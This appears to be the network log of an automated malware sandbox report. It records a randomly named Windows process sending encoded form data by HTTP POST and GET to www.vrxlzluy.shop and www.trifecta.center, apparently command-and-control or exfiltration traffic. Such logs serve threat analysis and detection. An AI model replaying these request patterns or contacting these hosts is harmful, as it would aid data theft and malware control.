                                                                                        Nov 1, 2024 19:43:45.851414919 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                        Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                        Nov 1, 2024 19:43:45.851475954 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                        Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                        Nov 1, 2024 19:43:45.851658106 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                        Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                        Nov 1, 2024 19:43:45.856249094 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                        Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449822188.114.96.3804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:01.363862991 CET710OUTPOST /o91n/ HTTP/1.1
                                                                                        Host: www.vrxlzluy.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.vrxlzluy.shop
                                                                                        Referer: http://www.vrxlzluy.shop/o91n/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 49 41 64 75 6a 74 31 70 61 41 52 33 35 43 58 58 6d 79 61 49 2f 6d 35 59 48 59 6e 51 37 74 4b 51 73 72 2b 5a 48 2b 2b 4c 42 55 48 79 4c 6c 38 66 53 39 67 7a 36 6d 48 4c 42 63 67 65 33 57 75 77 34 2b 45 45 79 62 50 59 56 2b 6f 79 45 77 6b 78 49 74 4d 4b 48 76 58 46 4f 6b 46 61 6d 4e 79 49 57 47 64 58 61 34 6f 4b 74 6c 5a 54 51 56 30 6b 61 68 76 76 4b 50 79 32 4e 74 7a 72 6c 76 62 2f 64 34 73 76 61 48 5a 67 47 52 6c 2f 48 44 66 32 30 55 54 50 51 63 56 72 5a 63 42 5a 75 5a 4f 58 42 4f 65 70 6b 68 69 53 54 32 32 75 34 4d 4c 32 73 61 4f 39 6a 77 3d 3d
                                                                                        Data Ascii: XbDhGVR=ejBa2YGtPeopIAdujt1paAR35CXXmyaI/m5YHYnQ7tKQsr+ZH++LBUHyLl8fS9gz6mHLBcge3Wuw4+EEybPYV+oyEwkxItMKHvXFOkFamNyIWGdXa4oKtlZTQV0kahvvKPy2Ntzrlvb/d4svaHZgGRl/HDf20UTPQcVrZcBZuZOXBOepkhiST22u4ML2saO9jw==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449836188.114.96.3804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:04.065896034 CET730OUTPOST /o91n/ HTTP/1.1
                                                                                        Host: www.vrxlzluy.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.vrxlzluy.shop
                                                                                        Referer: http://www.vrxlzluy.shop/o91n/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 4a 6a 46 75 68 4b 42 70 4c 51 52 30 6c 53 58 58 6f 53 61 4d 2f 6d 31 59 48 63 58 41 37 66 65 51 76 4a 57 5a 57 50 2b 4c 41 55 48 79 45 46 38 51 59 64 67 38 36 6d 44 63 42 64 63 65 33 58 4f 77 34 36 55 45 79 6f 6e 66 55 75 6f 30 4d 51 6b 6b 56 64 4d 4b 48 76 58 46 4f 6b 35 30 6d 4e 71 49 57 32 4e 58 49 4b 4d 46 75 6c 5a 51 41 46 30 6b 65 68 75 48 4b 50 79 45 4e 75 33 52 6c 74 6a 2f 64 35 63 76 5a 57 5a 6a 50 52 6c 35 61 54 65 31 30 6c 32 61 49 2b 6b 39 52 76 52 65 6f 70 65 44 41 49 54 7a 31 51 44 46 42 32 53 64 6c 4c 43 43 68 5a 7a 30 34 77 32 72 6d 46 6d 62 59 75 56 43 70 67 44 31 56 72 4d 59 38 70 49 3d
                                                                                        Data Ascii: XbDhGVR=ejBa2YGtPeopJjFuhKBpLQR0lSXXoSaM/m1YHcXA7feQvJWZWP+LAUHyEF8QYdg86mDcBdce3XOw46UEyonfUuo0MQkkVdMKHvXFOk50mNqIW2NXIKMFulZQAF0kehuHKPyENu3Rltj/d5cvZWZjPRl5aTe10l2aI+k9RvReopeDAITz1QDFB2SdlLCChZz04w2rmFmbYuVCpgD1VrMY8pI=
                                                                                        Nov 1, 2024 19:44:05.775711060 CET1236INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:44:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-litespeed-tag: 59f_HTTP.404
                                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                                        link: <https://vrxlzluy.shop/wp-json/>; rel="https://api.w.org/"
                                                                                        x-litespeed-cache-control: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qi4iazdXf1iKb89srG2XEeCpcZJgKo8iV4%2BAeVMLlEaOYaTWywMWhh2IHd2oqi1aqr5Nek7q%2B%2FH1mBATRGL5FXfLSoPag%2BBlZlfEwWAVgQr2smQnNXbY1lqJAoWaWqBLC1nSAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe08b8ce1dddb3-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=730&delivery_rate=0&cwnd=71&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 64 65 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 4d 26 3b 39 f6 a8 cc 38 15 27 b5 b5 65 bb 52 02 3d 68 39 20 b1 92 e8 23 3d fc f7 2d 01 dd 4d 1f 8e 3d de d9 75 2a 09 3c bd 5b ef 92 f0 e5 f1 9b ab d7 9f fe f5 e1 ad 36 91 59 fa f2 e8 52 fd a7 a5 88 26 81 0e d4 fe 7c ad 6b 39 87 98 cc 03 9d 25 be 36 91 32 17 7e b7 cb 92 dc c9 a0 4b c5 89 ae 45 29 12 22 d0 53 86 30 a1 89 2d 88 04 8d 32 fb 5e e8 8a 1d 20 fc f2 e8 87 cb 0c 24 d2 a2 09 e2 02 64 a0 7f fe f4 ce 3e d7 b5 ae 5a 49 09 fd aa 71 48 03 3d e7 2c 26 29 e8 da 84 43 1c e8 4a 96 df
                                                                                        Data Ascii: de7is8W`\M&;98'eR=h9 #=-M=u*<[6YR&|k9%62~KE)"S0-2^ $d>ZIqH=,&)CJ
                                                                                        Nov 1, 2024 19:44:05.775818110 CET1236INData Raw: ed 26 59 9e 38 8c 27 dd 79 4c bb 9e b7 4f 45 68 12 a2 e8 6b 9b 4c a9 38 e5 f3 f4 5b 5a 2c 1c 31 61 79 77 9e a5 3c 8f 9c 7c 92 57 0c 8e 7e 50 3f 97 22 e2 24 97 2f 31 8b 8a 0c a8 74 56 0f 6f 53 a8 de 2b d3 7e 43 19 68 81 f6 04 a4 17 da a9 b6 00 61
                                                                                        Data Ascii: &Y8'yLOEhkL8[Z,1ayw<|W~P?"$/1tVoS+~Cha^|A$Setj$aP>7-CmX6Z,M!FveSqkr`%J!}yl5 M4!\|C-\hD!9q"u5~yt)L
                                                                                        Nov 1, 2024 19:44:05.775832891 CET424INData Raw: 6e 1c 5c ac 1c 2c 66 44 b9 5f 9a cb 08 09 d0 e3 14 25 ba df 10 2a 36 fa 6d 81 cf fb d1 6d 81 e3 b8 7f 5b c4 e0 c6 b7 45 cf 75 f1 6d d1 3b 43 a3 1a a2 3f 88 16 6e a1 99 3f 1f 7b fe f1 36 5b 1c a3 d6 73 5f df 5d aa 99 b4 10 cc 4e e7 78 57 b3 c1 6d
                                                                                        Data Ascii: n\,fD_%*6mm[Eum;C?n?{6[s_]NxWm{[lzg8?dB =<g.{TR/\zZ]a Y6MQbB*,VCWMYHcP!r*E*Z5}Df6:tBWI
                                                                                        Nov 1, 2024 19:44:05.775844097 CET1236INData Raw: 29 52 f0 d2 82 aa 72 36 12 b7 5c 40 1c 84 f1 db 29 50 a9 4e 34 aa bb 18 fa 9b ab 5f 5f d7 13 d1 7b 86 30 60 dd 02 6b c9 68 04 d5 36 94 75 e1 db 63 26 6b 7f d1 60 0d d9 b4 1e 08 aa 8e 91 ab eb 2c 63 a7 ab 24 ab ae 62 9a 63 12 1b 3a 0b ef 21 92 7a
                                                                                        Data Ascii: )Rr6\@)PN4__{0`kh6uc&k`,c$bc:!zt::-x[Wsw]0^stY;hcm5U=-4*eT:?ED9NM]UWC,47VR+0#un/nv:0c;jnMs['%;kt&RB]
                                                                                        Nov 1, 2024 19:44:05.775856972 CET473INData Raw: 49 56 e6 ee a2 d7 a6 1c 14 00 14 ef e3 8b 1c 45 60 87 20 67 00 74 8f 6e 6b b5 74 ea a3 95 ad 66 46 e0 95 03 97 51 4a 72 9f ab 9b 3e 2f 9f 5b ad bf e6 78 c6 38 b6 67 1c e5 7e 1d 06 ad d1 a4 99 bc dc b1 3d 83 f0 2b 91 b6 62 63 e7 48 4e 7c 42 05 48
                                                                                        Data Ascii: IVE` gtnktfFQJr>/[x8g~=+bcHN|BHchf3S6'cHW}VCU;Rm*"5`0[YNP|\MgJy0k~>A>W!!b"Q,fW/(~7m8Un4El
                                                                                        Nov 1, 2024 19:44:05.776304960 CET473INData Raw: 49 56 e6 ee a2 d7 a6 1c 14 00 14 ef e3 8b 1c 45 60 87 20 67 00 74 8f 6e 6b b5 74 ea a3 95 ad 66 46 e0 95 03 97 51 4a 72 9f ab 9b 3e 2f 9f 5b ad bf e6 78 c6 38 b6 67 1c e5 7e 1d 06 ad d1 a4 99 bc dc b1 3d 83 f0 2b 91 b6 62 63 e7 48 4e 7c 42 05 48
                                                                                        Data Ascii: IVE` gtnktfFQJr>/[x8g~=+bcHN|BHchf3S6'cHW}VCU;Rm*"5`0[YNP|\MgJy0k~>A>W!!b"Q,fW/(~7m8Un4El


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449853188.114.96.3804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:06.658864021 CET10812OUTPOST /o91n/ HTTP/1.1
                                                                                        Host: www.vrxlzluy.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.vrxlzluy.shop
                                                                                        Referer: http://www.vrxlzluy.shop/o91n/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 4a 6a 46 75 68 4b 42 70 4c 51 52 30 6c 53 58 58 6f 53 61 4d 2f 6d 31 59 48 63 58 41 37 66 47 51 73 36 75 5a 48 63 47 4c 53 6b 48 79 4e 6c 39 33 59 64 67 68 36 6d 37 51 42 64 51 30 33 53 4b 77 71 74 38 45 37 35 6e 66 64 75 6f 30 54 67 6c 44 49 74 4d 66 48 70 33 42 4f 6b 4a 30 6d 4e 71 49 57 77 4a 58 66 49 6f 46 6f 6c 5a 54 51 56 30 6f 61 68 76 71 4b 50 4b 2b 4e 74 62 42 6c 64 44 2f 65 5a 4d 76 66 67 74 6a 41 52 6c 37 5a 54 65 58 30 6c 4c 4b 49 2b 6f 48 52 73 4e 34 6f 72 43 44 42 35 69 71 70 45 33 7a 43 57 43 36 2f 70 6a 67 6f 36 54 69 39 77 66 58 70 6e 65 69 59 36 4a 38 6b 77 43 63 4f 49 63 75 76 39 74 51 71 78 39 58 55 38 38 6e 73 73 6c 50 4d 54 67 78 7a 73 32 36 75 7a 34 38 5a 32 52 34 59 33 4a 52 63 72 33 31 6d 32 67 79 34 31 51 79 72 77 42 4f 76 56 72 54 6c 78 53 59 48 5a 52 56 6f 7a 4b 69 6a 49 6e 4c 47 66 4c 4c 70 67 7a 77 4b 6e 63 79 2f 54 2f 79 69 39 66 74 49 70 65 79 4f 62 49 45 36 76 4c 34 76 58 68 7a 31 74 30 4a 67 6c 52 44 6e 4b [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=ejBa2YGtPeopJjFuhKBpLQR0lSXXoSaM/m1YHcXA7fGQs6uZHcGLSkHyNl93Ydgh6m7QBdQ03SKwqt8E75nfduo0TglDItMfHp3BOkJ0mNqIWwJXfIoFolZTQV0oahvqKPK+NtbBldD/eZMvfgtjARl7ZTeX0lLKI+oHRsN4orCDB5iqpE3zCWC6/pjgo6Ti9wfXpneiY6J8kwCcOIcuv9tQqx9XU88nsslPMTgxzs26uz48Z2R4Y3JRcr31m2gy41QyrwBOvVrTlxSYHZRVozKijInLGfLLpgzwKncy/T/yi9ftIpeyObIE6vL4vXhz1t0JglRDnKk+qbvzEwRpETa2yPHupD+YrmCfUPIT9N9mAeOI6aWn9iF9dr7DPCJ1StlB9KqcxOZqr4G/KiJmNYNWeBxk/ot3R7kYOSqJtc/GSy9AMBc4inPHQ/Z3VTW5VCrD5kx1s8z/HRqcRiDtXY8xf0xUTzgLYw4fkrzyZjJdxN4lVo2MObrz6eDXWZVICNF0NgCu0Ie+H8tzy69RHvCPhCY2dssPol2IyZtDngmQXHRkQ1O673qIq400AlJn4N2XiUsBuPqwurJwp/Jt1Qzi+shzcHd2mnFM85t7INCx+fLWavy5jyXHy1Ld6J3c4SDfi+15K/L2yGM+vNIlcxLaxPwXFh3uIr89SxSPJB3n8C+tsXJpQUQ9RtwoRM21cO9G73XNELmEtZmWbo/+4O76+0NDOjVVZvy+5tBHjmEhZJ4/QReSCVOZCI0Sm9OV1xhps12UshaUS7H/IW8qn+95WRoSmENtsIUEtpU7ccYY5TvGRvF/W3k8C3GY0RLUECnewusCZN96FWcMjHzvLi442+ByHul5QVzTJD4j4PrwyfAHVK/UyAczQkHsE+TTmox1ujCAe3IY236hY019JpR2OeTrnZzycEQK5NddAREEtJKB35CKLaww4qEP068S4jA3f1losPsjGqbGH4rMY0cZdvPHDxpf4KoZZwvJFTtm [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449864188.114.96.3804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:09.216675997 CET448OUTGET /o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.vrxlzluy.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:44:10.733464003 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                        Date: Fri, 01 Nov 2024 18:44:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                                        x-redirect-by: WordPress
                                                                                        location: https://vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP
                                                                                        x-litespeed-cache-control: public,max-age=3600
                                                                                        x-litespeed-tag: 59f_HTTP.404,59f_HTTP.301,59f_404,59f_URL.5d76aa37dbc043a4dec01f7366a41e31,59f_
                                                                                        x-litespeed-cache: miss
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXVuBWOYZybZFlUBJFO8S%2FMR%2FImUCROoaqM%2FMPs3uT%2BKt3ddcs60I9vVg84Yp7qOc6CglJaF5KDTSyFohhCQ5dplYI0L6rcaJ8%2Fa7G4WNmq9h51%2BvxVf1fiq5GGdvV2%2Ff%2BVk2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe08d91e8c2d2f-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1438&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=448&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=00000
                                                                                        Data Raw:
                                                                                        Data Ascii:
                                                                                        Nov 1, 2024 19:44:10.733572960 CET29INData Raw: 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0000000000&ts=0&x=0"0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.4499003.33.130.190804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:15.789380074 CET716OUTPOST /3c6w/ HTTP/1.1
                                                                                        Host: www.trifecta.center
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.trifecta.center
                                                                                        Referer: http://www.trifecta.center/3c6w/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 49 4c 55 58 66 34 4b 52 53 32 30 5a 41 48 78 6b 78 30 44 39 58 49 78 79 53 55 46 63 52 57 48 41 4a 76 7a 47 35 62 6d 51 6f 52 7a 5a 4b 77 66 34 57 72 38 4a 58 6e 6a 54 74 37 4f 47 4f 73 30 41 41 4d 62 6a 50 67 43 67 78 43 55 72 47 4b 70 73 36 56 62 63 67 74 56 31 6a 30 74 4e 45 44 59 36 51 53 76 67 49 47 41 30 42 4c 32 55 31 30 70 35 2b 4a 35 30 32 39 69 35 46 6f 42 6c 4a 35 76 6e 54 48 56 65 4f 6e 4c 31 4c 4b 38 56 4a 58 45 6e 51 36 74 47 5a 6a 41 54 57 4f 6c 79 58 6c 46 73 42 76 64 6a 2b 6a 66 76 6c 33 42 51 70 2b 4a 68 30 37 31 6d 43 35 34 31 72 4c 4d 4a 77 46 2b 30 6e 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=ILUXf4KRS20ZAHxkx0D9XIxySUFcRWHAJvzG5bmQoRzZKwf4Wr8JXnjTt7OGOs0AAMbjPgCgxCUrGKps6VbcgtV1j0tNEDY6QSvgIGA0BL2U10p5+J5029i5FoBlJ5vnTHVeOnL1LK8VJXEnQ6tGZjATWOlyXlFsBvdj+jfvl3BQp+Jh071mC541rLMJwF+0ng==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.4499163.33.130.190804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:18.329583883 CET736OUTPOST /3c6w/ HTTP/1.1
                                                                                        Host: www.trifecta.center
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.trifecta.center
                                                                                        Referer: http://www.trifecta.center/3c6w/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 49 4c 55 58 66 34 4b 52 53 32 30 5a 42 6e 68 6b 38 33 72 39 44 59 78 78 4f 6b 46 63 62 32 48 4d 4a 75 50 47 35 61 53 41 70 6a 48 5a 4b 55 50 34 58 75 51 4a 55 6e 6a 54 35 72 4f 44 54 63 31 4d 41 4d 58 52 50 69 6d 67 78 44 30 72 47 4c 5a 73 36 6b 62 62 36 64 56 72 6f 55 74 4c 62 54 59 36 51 53 76 67 49 47 38 53 42 4c 75 55 31 45 5a 35 39 6f 35 7a 71 74 69 36 43 6f 42 6c 4e 35 76 6a 54 48 55 4c 4f 6d 57 65 4c 49 45 56 4a 57 30 6e 51 6f 4a 46 58 6a 41 56 4c 65 6b 6b 58 57 30 7a 59 71 51 65 2b 44 33 4d 72 55 5a 6a 6c 59 45 37 6c 4b 55 78 51 35 63 47 32 4d 46 39 39 47 44 39 38 6f 45 44 66 30 46 75 6f 6b 49 67 34 44 2b 38 76 43 74 37 7a 5a 63 3d
                                                                                        Data Ascii: XbDhGVR=ILUXf4KRS20ZBnhk83r9DYxxOkFcb2HMJuPG5aSApjHZKUP4XuQJUnjT5rODTc1MAMXRPimgxD0rGLZs6kbb6dVroUtLbTY6QSvgIG8SBLuU1EZ59o5zqti6CoBlN5vjTHULOmWeLIEVJW0nQoJFXjAVLekkXW0zYqQe+D3MrUZjlYE7lKUxQ5cG2MF99GD98oEDf0FuokIg4D+8vCt7zZc=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.4499323.33.130.190804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:44:20.879575014 CET10818OUTPOST /3c6w/ HTTP/1.1
                                                                                        Host: www.trifecta.center
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.trifecta.center
                                                                                        Referer: http://www.trifecta.center/3c6w/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 49 4c 55 58 66 34 4b 52 53 32 30 5a 42 6e 68 6b 38 33 72 39 44 59 78 78 4f 6b 46 63 62 32 48 4d 4a 75 50 47 35 61 53 41 70 6a 66 5a 4b 44 6e 34 57 4a 6b 4a 56 6e 6a 54 36 72 4f 43 54 63 31 46 41 4d 50 56 50 69 61 77 78 47 77 72 48 74 4e 73 74 47 2f 62 30 74 56 72 6e 30 74 4b 45 44 59 4b 51 53 2b 49 49 47 4d 53 42 4c 75 55 31 47 78 35 70 70 35 7a 6f 74 69 35 46 6f 42 35 4a 35 76 4c 54 48 4d 62 4f 6d 53 6f 4c 37 4d 56 4a 32 6b 6e 53 62 74 46 66 6a 41 58 4b 65 6b 73 58 57 34 57 59 71 6b 46 2b 44 7a 32 72 53 6c 6a 32 75 68 61 2f 35 51 4e 47 36 59 76 76 73 6c 4f 6d 33 66 4c 77 36 77 4d 59 57 31 33 71 32 49 78 2f 77 72 43 31 67 56 78 68 4f 58 50 53 37 44 45 79 33 33 52 75 31 51 70 2b 4a 6e 36 42 71 4a 56 62 58 41 51 2f 43 63 44 42 57 58 4b 78 39 58 48 73 36 45 77 55 2b 48 2b 71 63 74 6b 49 30 35 76 68 58 47 57 66 45 46 66 4a 6a 75 63 6e 70 36 48 45 42 6a 45 62 35 44 50 71 5a 51 64 55 32 41 74 4c 30 43 68 49 4e 6c 66 6f 6f 68 5a 47 6b 6f 68 70 78 7a 51 51 4c 50 58 58 36 35 6f 58 54 [TRUNCATED]
